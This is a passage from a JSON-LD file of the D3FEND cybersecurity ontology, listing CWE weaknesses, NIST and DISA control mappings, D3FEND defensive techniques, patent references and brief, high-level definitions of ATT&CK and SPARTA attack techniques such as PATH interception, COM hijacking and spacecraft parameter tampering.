      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SatelliteTransponder"
      }
    },
    {
      "@id": "d3f:CWE-927",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-927",
      "d3f:definition": "The Android application uses an implicit intent for transmitting sensitive data to other applications.",
      "rdfs:label": "Use of Implicit Intent for Sensitive Communication",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-285"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:Semi-supervisedPre-training",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SSPT",
      "d3f:definition": "Pre-training methods are aimed to guide the parameters of a network towards interesting regions in model space using unlabeled data, before fine-tuning the parameters with the labeled data",
      "d3f:kb-article": "## References\nJashish Shrestha. (n.d.). Beginner's Guide to Semi-Supervised Learning. [Link](http://jashish.com.np/blog/posts/beginners-guide-to-semi-supervised-learning/)",
      "rdfs:label": "Semi-supervised Pre-training",
      "rdfs:subClassOf": {
        "@id": "d3f:UnsupervisedPreprocessing"
      }
    },
    {
      "@id": "d3f:CWE-687",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-687",
      "d3f:definition": "The product calls a function, procedure, or routine, but the caller specifies an argument that contains the wrong value, which may lead to resultant weaknesses.",
      "rdfs:label": "Function Call With Incorrectly Specified Argument Value",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-628"
      }
    },
    {
      "@id": "d3f:CCI-002421_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to prevent unauthorized disclosure of information and/or detect changes to information during transmission unless otherwise protected by organization-defined alternative physical safeguards.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002421"
    },
    {
      "@id": "d3f:T1574.007",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1574.007",
      "d3f:creates": {
        "@id": "d3f:ExecutableFile"
      },
      "d3f:definition": "Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. The PATH environment variable contains a list of directories (User and System) that the OS searches sequentially through in search of the binary that was called from a script or the command line.",
      "rdfs:label": "Path Interception by PATH Environment Variable",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1574"
        },
        {
          "@id": "_:N94f4f80078664de0b7919434ecab4bab"
        }
      ]
    },
    {
      "@id": "_:N94f4f80078664de0b7919434ecab4bab",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableFile"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-6_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Least Privilege | Authorize Access to Security Functions",
      "d3f:exactly": {
        "@id": "d3f:SystemConfigurationPermissions"
      },
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-6(1)"
    },
    {
      "@id": "d3f:DiskPartitioning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskPartitioning"
      ],
      "d3f:creates": {
        "@id": "d3f:PartitionTable"
      },
      "d3f:d3fend-id": "D3-DKP",
      "d3f:definition": "Disk Partitioning is the process of dividing a disk into multiple distinct sections, known as partitions.",
      "d3f:kb-article": "### How it works\n\nEach partition can be managed separately and can have its own file system. Disk partitioning can be used to segregate sensitive data from less critical data, improve system performance, and enhance data management and recovery processes. It can also help in isolating different operating systems or environments on the same physical disk.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices"
      },
      "rdfs:label": "Disk Partitioning",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiskFormatting"
        },
        {
          "@id": "_:N41a558f1aa6d4ba3870da843768eb05f"
        }
      ]
    },
    {
      "@id": "_:N41a558f1aa6d4ba3870da843768eb05f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PartitionTable"
      }
    },
    {
      "@id": "d3f:CCI-001957_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:One-timePassword"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements organization-defined out-of-band authentication under organization-defined conditions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-05-03T00:00:00"
      },
      "rdfs:label": "CCI-001957"
    },
    {
      "@id": "d3f:d3fend-catalog-data-property",
      "@type": "owl:DatatypeProperty",
      "rdfs:label": "d3fend-catalog-data-property",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-data-property"
      },
      "skos:altLabel": {
        "@language": "en",
        "@value": "d3fend-vendor-registry-data-property"
      }
    },
    {
      "@id": "d3f:CCI-002272_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system dynamically associates security attributes with organization-defined objects in accordance with organization-defined security policies as information is created and combined.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002272"
    },
    {
      "@id": "d3f:Reference-BroadcastIsolationAndLevel3NetworkSwitch_HewlettPackardEnterpriseDevelopmentLP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5920699A"
      },
      "d3f:kb-abstract": "A network switch comprising a switching Application Specific Integrated Circuit (ASIC) and a Virtual Switching Engine (VSE) connected to a plurality of ports. The switching ASIC has a high-speed memory table which enables it to look up addresses that it has previously obtained and to forward unicast packets to said addresses. The VSE is a CPU that makes switching decisions outside of the ASIC and keeps track of any unknown addresses, forwarding the packets out the appropriate ports and answers broadcast packets by proxy for all known addresses without forwarding any of the packets down the VLANs, thereby freeing the VLAN bandwidth from excessive traffic. The system requires no user configuration because the switching methodology is self-adaptive to the network in which it is inserted and has the ability to perform router functions such as level 2 and 3 switching, spanning tree protocols and compatibility with Internetwork Packet and Internetwork Packet Exchange networks.",
      "d3f:kb-author": "Ballard C. Bare",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Hewlett Packard Enterprise Development LP",
      "d3f:kb-reference-of": {
        "@id": "d3f:BroadcastDomainIsolation"
      },
      "d3f:kb-reference-title": "Broadcast isolation and level 3 network switch",
      "rdfs:label": "Reference - Broadcast isolation and level 3 network switch - Hewlett Packard Enterprise Development LP"
    },
    {
      "@id": "d3f:RD-0001.03",
      "@type": "owl:Class",
      "d3f:attack-id": "RD-0001.03",
      "d3f:definition": "A well-resourced actor may field their own spacecraft or hosted payload to gain proximity, visibility, or RF leverage. Small satellites can be launched into nearby planes or phasing orbits to observe emissions, perform spectrum measurements, or test spoofing and denial techniques at short range. Hosted payloads on commercial buses provide co-location without full spacecraft development. Proximity also enables on-orbit relay, crosslink probing, or attempts to exploit weak segmentation between payload and bus on rideshares. Regulatory and tracking regimes complicate overt misuse, but shell companies, benign-seeming mission declarations, or flags of convenience can mask intent.",
      "rdfs:label": "Spacecraft - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/RD-0001/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RD-0001"
      },
      "skos:prefLabel": "Spacecraft"
    },
    {
      "@id": "d3f:CWE-152",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-152",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could be interpreted as macro symbols when they are sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Macro Symbols",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-138"
      }
    },
    {
      "@id": "d3f:CWE-612",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-612",
      "d3f:definition": "The product creates a search index of private or sensitive documents, but it does not properly limit index access to actors who are authorized to see the original information.",
      "rdfs:label": "Improper Authorization of Index Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1230"
      }
    },
    {
      "@id": "d3f:WindowsNtProtectVirtualMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "rdfs:label": "Windows NtProtectVirtualMemory",
      "rdfs:seeAlso": {
        "@id": "https://www.delphibasics.info/home/delphibasicssnippets/nativewriteprocessmemoryapireplacement"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIAllocateMemory"
      }
    },
    {
      "@id": "d3f:SystemInitConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "System initialization configuration information is configuration information used to configure the services, parameters, and initial settings for an operating system at startup.",
      "rdfs:label": "System Init Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      },
      "skos:altLabel": "Autoruns"
    },
    {
      "@id": "d3f:CWE-538",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-538",
      "d3f:definition": "The product places sensitive information into files or directories that are accessible to actors who are allowed to have access to the files, but not to the sensitive information.",
      "rdfs:label": "Insertion of Sensitive Information into Externally-Accessible File or Directory",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:PartitionTable",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": {
        "@id": "d3f:Partition"
      },
      "d3f:definition": "A partition is a fixed-size subset of a storage device which is treated as a unit by the operating system. A partition table is a table maintained on the storage device by the operating system describing the partitions on that device. The terms partition table and partition map are most commonly associated with the MBR partition table of a Master Boot Record (MBR) in IBM PC compatibles, but it may be used generically to refer to other \"formats\" that divide a disk drive into partitions, such as: GUID Partition Table (GPT), Apple partition map (APM), or BSD disklabel.",
      "d3f:may-contain": {
        "@id": "d3f:BootRecord"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Partition_table"
      },
      "rdfs:label": "Partition Table",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N6a408017254d44cf86361cbbaebcfd7a"
        },
        {
          "@id": "_:N72c68255040b4c48b34e486645be46cf"
        }
      ]
    },
    {
      "@id": "_:N6a408017254d44cf86361cbbaebcfd7a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Partition"
      }
    },
    {
      "@id": "_:N72c68255040b4c48b34e486645be46cf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootRecord"
      }
    },
    {
      "@id": "d3f:CCI-002264_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:UserAccountPermissions"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization provides the means to associate organization-defined types of security attributes having organization-defined security attribute values with information in transmission.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002264"
    },
    {
      "@id": "d3f:EX-0012.07",
      "@type": "owl:Class",
      "d3f:attack-id": "EX-0012.07",
      "d3f:definition": "Propulsion relies on parameters and sensed values that govern burns, pressure management, and safing. Editable items include thruster calibration and minimum impulse bit, valve timing and duty limits, inhibit masks, delta-V tables, plume keep-out constraints, tank pressure/temperature thresholds, leak-detection limits, and momentum-management coupling with attitude control. By modifying these, an adversary can provoke over-correction, waste propellant through repeated trims, bias orbit maintenance, or trigger protective sequences at inopportune times. False pressure or temperature readings can cause autonomous venting or lockouts; tweaked alignment matrices or misapplied gimbal limits can yield off-axis thrust and attitude excursions; altered desaturation rules can induce frequent wheel unloads that sap resources. Because consumables are finite and margins tight, even modest parameter drift can shorten mission life or violate keep-out and conjunction constraints while presenting as “normal” control activity.",
      "rdfs:label": "Propulsion Subsystem - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0012/07/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:EX-0012"
      },
      "skos:prefLabel": "Propulsion Subsystem"
    },
    {
      "@id": "d3f:CopyToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemCall"
      ],
      "d3f:copies": {
        "@id": "d3f:AccessToken"
      },
      "rdfs:label": "Copy Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Ndfb3df7163f048ef83f5b1d278d74fd2"
        }
      ]
    },
    {
      "@id": "_:Ndfb3df7163f048ef83f5b1d278d74fd2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:copies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:CWE-46",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-46",
      "d3f:definition": "The product accepts path input in the form of trailing space ('filedir ') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files.",
      "rdfs:label": "Path Equivalence: 'filename ' (Trailing Space)",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-162"
        },
        {
          "@id": "d3f:CWE-41"
        }
      ]
    },
    {
      "@id": "d3f:MessageTransferAgent",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A message transfer agent or mail transfer agent (MTA) or mail relay is software that transfers electronic mail messages from one computer to another using a client-server application architecture. An MTA implements both the client (sending) and server (receiving) portions of the Simple Mail Transfer Protocol.",
      "rdfs:label": "Message Transfer Agent",
      "rdfs:seeAlso": {
        "@id": "dbr:Message_transfer_agent"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:MailService"
      },
      "skos:altLabel": [
        "MTA",
        "Mail Transfer Agent"
      ]
    },
    {
      "@id": "d3f:NetworkAudioVisualStreamingResource",
      "@type": "owl:Class",
      "d3f:definition": "A server that provides digital audio-visual media content to users.",
      "rdfs:label": "Network Audio Visual Streaming Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:NetworkMultimediaStreamingResource"
      }
    },
    {
      "@id": "d3f:CWE-522",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-522",
      "d3f:definition": "The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.",
      "rdfs:label": "Insufficiently Protected Credentials",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-1390"
        },
        {
          "@id": "d3f:CWE-668"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1047",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1047",
      "d3f:definition": "The product contains modules in which one module has references that cycle back to itself, i.e., there are circular dependencies.",
      "rdfs:label": "Modules with Circular Dependencies",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1120"
      }
    },
    {
      "@id": "d3f:PerHostDownload-UploadRatioAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PerHostDownload-UploadRatioAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:NetworkTraffic"
      },
      "d3f:d3fend-id": "D3-PHDURA",
      "d3f:definition": "Detecting anomalies that indicate malicious activity by comparing the amount of data downloaded versus data uploaded by a host.",
      "d3f:kb-article": "## How it works\nAggregate pull vs. push ratios from metadata are used to develop a baseline for a given host over a specific time period, e.g., over a three-hour period, one day, one week, etc. Anomalies identified over a threshold produce an alert.\n\n## Considerations\nCollection and analysis of large network packet captures requires large storage and intensive computing power. The time windows used to calculate the ratio may vary in implementations, this consideration should take into account a threat model and likely effects (impacts) delivered by an adversary.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SystemForDetectingThreatsUsingScenario-basedTrackingOfInternalAndExternalNetworkTraffic_VECTRANETWORKSInc"
      },
      "rdfs:label": "Per Host Download-Upload Ratio Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N79ac84cf360b46efa828da937b63114d"
        }
      ]
    },
    {
      "@id": "_:N79ac84cf360b46efa828da937b63114d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:WindowsRegistryKeyRestoreEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a registry key is restored to a previous state using a backup or recovery mechanism.",
      "rdfs:label": "Windows Registry Key Restore Event",
      "rdfs:subClassOf": {
        "@id": "d3f:WindowsRegistryKeyEvent"
      }
    },
    {
      "@id": "d3f:T1122",
      "@type": "owl:Class",
      "d3f:attack-id": "T1122",
      "d3f:definition": "The Component Object Model (COM) is a system within Windows to enable interaction between software components through the operating system. (Citation: Microsoft Component Object Model) Adversaries can use this system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Windows Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead. (Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.015",
      "rdfs:label": "Component Object Model Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.015"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-595",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-595",
      "d3f:definition": "The product compares object references instead of the contents of the objects themselves, preventing it from detecting equivalent objects.",
      "rdfs:label": "Comparison of Object References Instead of Object Contents",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1025"
      }
    },
    {
      "@id": "d3f:may-be-accessed-by",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "may-be-accessed-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:NTPControlMessageEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an NTP client or server exchanges control messages used for diagnostic, monitoring, or administrative management of the NTP protocol, rather than time synchronization.",
      "rdfs:label": "NTP Control Message Event",
      "rdfs:subClassOf": {
        "@id": "d3f:NTPEvent"
      }
    },
    {
      "@id": "d3f:MobilePhone",
      "@type": "owl:Class",
      "d3f:definition": "A mobile phone, cellular phone, cell phone, cellphone or hand phone, sometimes shortened to simply mobile, cell or just phone, is a portable telephone that can make and receive calls over a radio frequency link while the user is moving within a telephone service area. The radio frequency link establishes a connection to the switching systems of a mobile phone operator, which provides access to the public switched telephone network (PSTN). Modern mobile telephone services use a cellular network architecture and, therefore, mobile telephones are called cellular telephones or cell phones in North America. In addition to telephony, digital mobile phones (2G) support a variety of other services, such as text messaging, MMS, email, Internet access, short-range wireless communications (infrared,",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Mobile_phone"
      },
      "rdfs:label": "Mobile Phone",
      "rdfs:subClassOf": {
        "@id": "d3f:PersonalComputer"
      },
      "skos:altLabel": [
        "Cellphone",
        "Cellular Phone"
      ]
    },
    {
      "@id": "d3f:maps",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x maps y: The entity x discovers and records how entity y is arranged and interconnected.",
      "rdfs:label": "maps",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-map"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForProvidingAnActivelyInvalidatedClient-sideNetworkResourceCache_IMVU",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9578081B2/en"
      },
      "d3f:kb-abstract": "A system and method for providing an actively invalidated client-side network resource cache are disclosed. A particular embodiment includes: a client configured to request, for a client application, data associated with an identifier from a server; the server configured to provide the data associated with the identifier and to establish a queue associated with the identifier at a scalable message queuing system, the client being configured to subscribe to the queue at the scalable message queuing system to receive invalidation information associated with the data; the server being further configured to signal the queue of an invalidation event associated with the data; the scalable message queuing system being configured to convey information indicative of the invalidation event to the client; and the client being further configured to re-request the data associated with the identifier from the server upon receipt of the information indicative of the invalidation event.",
      "d3f:kb-author": "Jon Watte",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "IMVU",
      "d3f:kb-reference-of": {
        "@id": "d3f:AuthenticationCacheInvalidation"
      },
      "d3f:kb-reference-title": "System and method for providing an actively invalidated client-side network resource cache",
      "rdfs:label": "Reference - System and method for providing an actively invalidated client-side network resource cache - IMVU"
    },
    {
      "@id": "d3f:DisableRemoteAccess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DisableRemoteAccess"
      ],
      "d3f:configures": {
        "@id": "d3f:ApplicationConfiguration"
      },
      "d3f:d3fend-id": "D3-DRA",
      "d3f:definition": "Limiting access to a computing device which is not required through or from a non-organization-controlled network.",
      "d3f:kb-article": "## How It Works\nThere are several different methods of achieving remote access restriction. This could include: time-based controls, just-in-time authorization, and deny-by-default controls.\n\nThis can be done on a Windows machine by unchecking an \"allow remote assistance\" or checking the \"don't allow remote connections\" boxes; creating firewall rules to block remote access protocols; uninstalling remote access software; disabling Wi-Fi, Ethernet, Bluetooth, or other connection methods enabling remote access.\n\nOne way to achieve remote access restrictions in OT is by programming logic in the OT Controller to give the Operator authorizing abilities which ensures local control is maintained. In this situation, a remote access modem would be powered on/off using a discrete output from an I/O module of the OT controller.\n    ",
      "rdfs:label": "Disable Remote Access",
      "rdfs:seeAlso": [
        {
          "@id": "https://www.dragos.com/blog/industry-news/value-of-plc-key-switch-monitoring/#:~:text=Run%20mode%E2%80%94The%20controller%20is,in%20the%20Remote%20Program%20mode"
        },
        "M0800 Authorization Enforcement"
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "_:Nea555d495c4447c7a77cb3e28c17a482"
        }
      ]
    },
    {
      "@id": "_:Nea555d495c4447c7a77cb3e28c17a482",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:configures"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ApplicationConfiguration"
      }
    },
    {
      "@id": "d3f:T1635",
      "@type": "owl:Class",
      "d3f:attack-id": "T1635",
      "d3f:definition": "Adversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering or URI hijacking and typically requires user action to grant access, such as through a system “Open With” dialogue.",
      "rdfs:label": "Steal Application Access Token - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileCredentialAccessTechnique"
      },
      "skos:prefLabel": "Steal Application Access Token"
    },
    {
      "@id": "d3f:may-block",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x may-block y: They entity x may block the thing y; that is, 'x blocks y' may be true.",
      "rdfs:label": "may-block",
      "rdfs:subPropertyOf": {
        "@id": "d3f:may-be-associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1338",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1338",
      "d3f:definition": "A hardware device is missing or has inadequate protection features to prevent overheating.",
      "rdfs:label": "Improper Protections Against Hardware Overheating",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-693"
      }
    },
    {
      "@id": "d3f:ExternalControl",
      "@type": "owl:Class",
      "rdfs:label": "External Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControlThing"
        },
        {
          "@id": "_:N10188d6b281b4f16a9765da3ff0036a1"
        },
        {
          "@id": "_:Ncfd1e18c4982469394a6104db3a0f555"
        }
      ]
    },
    {
      "@id": "_:N10188d6b281b4f16a9765da3ff0036a1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:member-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlCatalog"
      }
    },
    {
      "@id": "_:Ncfd1e18c4982469394a6104db3a0f555",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:semantic-relation"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "d3f:DHCPServiceApplication",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An application that automates the assignment of IP addresses and other network configuration parameters to devices on a network",
      "d3f:instructs": {
        "@id": "d3f:DHCPService"
      },
      "rdfs:label": "DHCP Service Application",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ServiceApplication"
        },
        {
          "@id": "_:N7ea2e698786f4972ba945b99e5e5d585"
        }
      ]
    },
    {
      "@id": "_:N7ea2e698786f4972ba945b99e5e5d585",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:instructs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DHCPService"
      }
    },
    {
      "@id": "d3f:Reference-MethodUsingKernelModeAssistanceForTheDetectionAndRemovalOfThreatsWhichAreActivelyPreventingDetectionAndRemovalFromARunningSystem_SymantecCorporation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8239947B1"
      },
      "d3f:kb-abstract": "A user mode application component invokes the assistance of a kernel mode driver component to detect and/or remediate malicious code on a computer system. The user mode application may include code that detects, for example, spyware and computer viruses, from user mode and when appropriate takes protective action when malicious code is detected. In one aspect, when the user mode application is unable to perform a selected operation in attempting to detect and/or take protective action, the user mode application invokes a kernel mode driver for assistance. The kernel mode driver assists user mode application in detecting malicious code and/or taking protective action by enabling or otherwise performing a selected operation for the user mode application.",
      "d3f:kb-author": "Adam Glick, Patrick Gardner, Pieter Viljoen",
      "d3f:kb-mitre-analysis": "This patent describes detecting registry changes using a prohibited change heuristic or a database of prohibited functions/function parameters.",
      "d3f:kb-organization": "Symantec Corporation",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:kb-reference-title": "Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system",
      "rdfs:label": "Reference - Method using kernel mode assistance for the detection and removal of threats which are actively preventing detection and removal from a running system - Symantec Corporation"
    },
    {
      "@id": "d3f:CWE-351",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-351",
      "d3f:definition": "The product does not properly distinguish between different types of elements in a way that leads to insecure behavior.",
      "rdfs:label": "Insufficient Type Distinction",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-345"
      }
    },
    {
      "@id": "d3f:Reference-MethodAndApparatusForIncreasingTheSpeedAtWhichComputerVirusesAreDetected_McAfeeLLC",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US5502815A"
      },
      "d3f:kb-abstract": "The method and apparatus for increasing the speed at which computer viruses are detected stores initial state information concerning the file or volume which is being examined for a virus. This information is stored in a cache in a non-volatile storage medium and when files are subsequently scanned for viruses, the current state information is compared to the initial state information stored in the cache. If the initial state information differs from the current state information then the file or volume is scanned for viruses which change the state information of the file or volume. If the initial state information and current state information is the same then the file or volume is scanned for a subset of viruses which do not change the state information.",
      "d3f:kb-author": "Paul D. Cozza",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "McAfee LLC",
      "d3f:kb-reference-of": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:kb-reference-title": "Method and apparatus for increasing the speed at which computer viruses are detected",
      "rdfs:label": "Reference - Method and apparatus for increasing the speed at which computer viruses are detected - McAfee LLC"
    },
    {
      "@id": "d3f:SetSystemConfigValue",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      },
      "rdfs:label": "Set System Config Value",
      "rdfs:seeAlso": {
        "@id": "https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regsetvalueexa"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemConfigSystemCall"
        },
        {
          "@id": "_:N8ea76bd3ddd44c098620dcb65eb60395"
        }
      ]
    },
    {
      "@id": "_:N8ea76bd3ddd44c098620dcb65eb60395",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabaseRecord"
      }
    },
    {
      "@id": "d3f:InternetNetworkTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
